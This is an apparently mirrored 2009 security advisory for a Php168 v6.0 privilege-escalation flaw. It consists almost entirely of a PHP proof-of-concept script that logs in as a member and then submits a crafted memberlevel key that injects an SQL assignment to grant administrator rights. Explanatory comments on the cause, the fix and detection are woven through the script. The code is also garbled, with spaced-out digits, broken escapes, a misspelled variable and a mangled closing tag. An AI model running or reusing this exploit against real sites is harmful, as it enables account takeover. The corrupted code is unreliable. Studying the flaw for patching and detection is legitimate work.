Php168 v6 privilege escalation vulnerability-vulnerability warning-the black bar safety net

2009-09-08T00:00:00
ID MYHACK58:62200924588
Type myhack58
Reporter 佚名
Modified 2009-09-08T00:00:00

Description

<? php

// Proof-of-concept driver published with the advisory, reproduced as captured on the page.
// Flow visible below: print a banner, require four CLI arguments (host, path, user, pass),
// call send() once to log in with a member account, then call send() a second time to
// submit a crafted profile update and look for a marker string in the response.
// Defender's reading: the only precondition shown is a valid member login, so the issue
// is reachable by any authenticated user of the affected Php168 v6.0 install.
print_r(' +---------------------------------------------------------------------------+ Php168 v6. 0 update user access exploit +---------------------------------------------------------------------------+ '); /* * works regardless of php. ini settings / if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php '.$ argv[0].' localhost /php168/ ryat 1 2 3 4 5 6 +---------------------------------------------------------------------------+ '); exit; }

// Script-side settings only: error reporting level 7 and no execution time limit.
error_reporting(7); ini_set('max_execution_time', 0);

// Positional CLI arguments; send() reads these through `global`.
$host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4];

// First send(): $cookie is not set yet, so send() takes its login branch. The regex keeps
// the `passport` cookie from the Set-Cookie header (group 1) and the 1-4 digit number at
// the start of its value (group 2), which send() later places in the `uid` query parameter.
$resp = send(); preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%0 9[a-zA-Z0-9%]+)/', $resp, $cookie);

// Second send(): $cookie is now set, so the crafted update is posted. Success is judged by
// the literal 'puret_t' appearing in the response. That literal is the ASCII decoding of
// the hex constant 0x70757265745f74 carried in the request body, so it doubles as a search
// string when reviewing web logs or what appears to be a member-profile field named
// `introduce` for signs of past abuse.
if ($cookie) if (strpos(send(), 'puret_t') !== false) exit("Expoilt Success!\ nYou Are Admin Now!\ n"); else exit("Exploit Failed!\ n"); else exit("Exploit Failed!\ n");

// Returns $length (default 8) characters picked with mt_rand() from a 62-character
// alphanumeric alphabet, after reseeding mt_srand() from microtime().
// The only caller on this page is send(), which uses the result as filler for the USR
// cookie value. mt_rand() is not a cryptographic generator; nothing here depends on
// the output being unpredictable.
function rands($length = 8) { $hash = "; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1 0 0 0 0 0 0); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)];

return $hash; }

// Builds one raw HTTP/1.1 POST by hand, writes it to a TCP socket on $host and returns
// the whole response (status line, headers and body) as a single string.
// Reads $host, $path, $user, $pass and $cookie through `global`; which request is built
// depends on whether $cookie has been filled by the caller's preg_match().
function send() { global $host, $path, $user, $pass, $cookie;

// Authenticated branch (if): an extra `USR=` value is appended to the session cookie and
// the body posts `memberlevel[...]` fields to member/homepage.php. The third field's array
// KEY is `3,introduce%3D0x70757265745f74` (`%3D` is `=`), i.e. the key itself carries a
// comma and an assignment rather than a plain index.
// NOTE(review): this suggests the application copies memberlevel keys into an SQL UPDATE
// without validating them - confirm against the Php168 source. The server-side fix is to
// accept only integer keys from an allow-list and to bind values as parameters.
// Detection: a request body to member/homepage.php in which a memberlevel[] key contains
// anything other than digits is the anomaly to alert on.
// Login branch (else): posts username, password and step=2 to do/login.php.
// Both branches send the same fixed User-Agent and Accept-Language headers.
if ($cookie) { $cookie[1] .= ';USR='. rands()."\ t31\t\t"; $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

$message = "POST ".$ path."member/homepage. php? uid=$cookie[2] HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n"; $message .= "Cookie: ".$ cookies[1]."\ r\n\r\n"; $message .= $cmd; } else { $cmd = "username=$user&password=$pass&step=2";

$message = "POST ".$ path."do/login.php HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; }

// Plain-text socket to $host (no TLS). The fsockopen() result is not checked before
// fputs(); only the read loop below tests $fp, and it stops at EOF, which the
// `Connection: Close` request header relies on.
$fp = fsockopen($host, 8 0); fputs($fp, $message);

$resp = ";

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?& gt;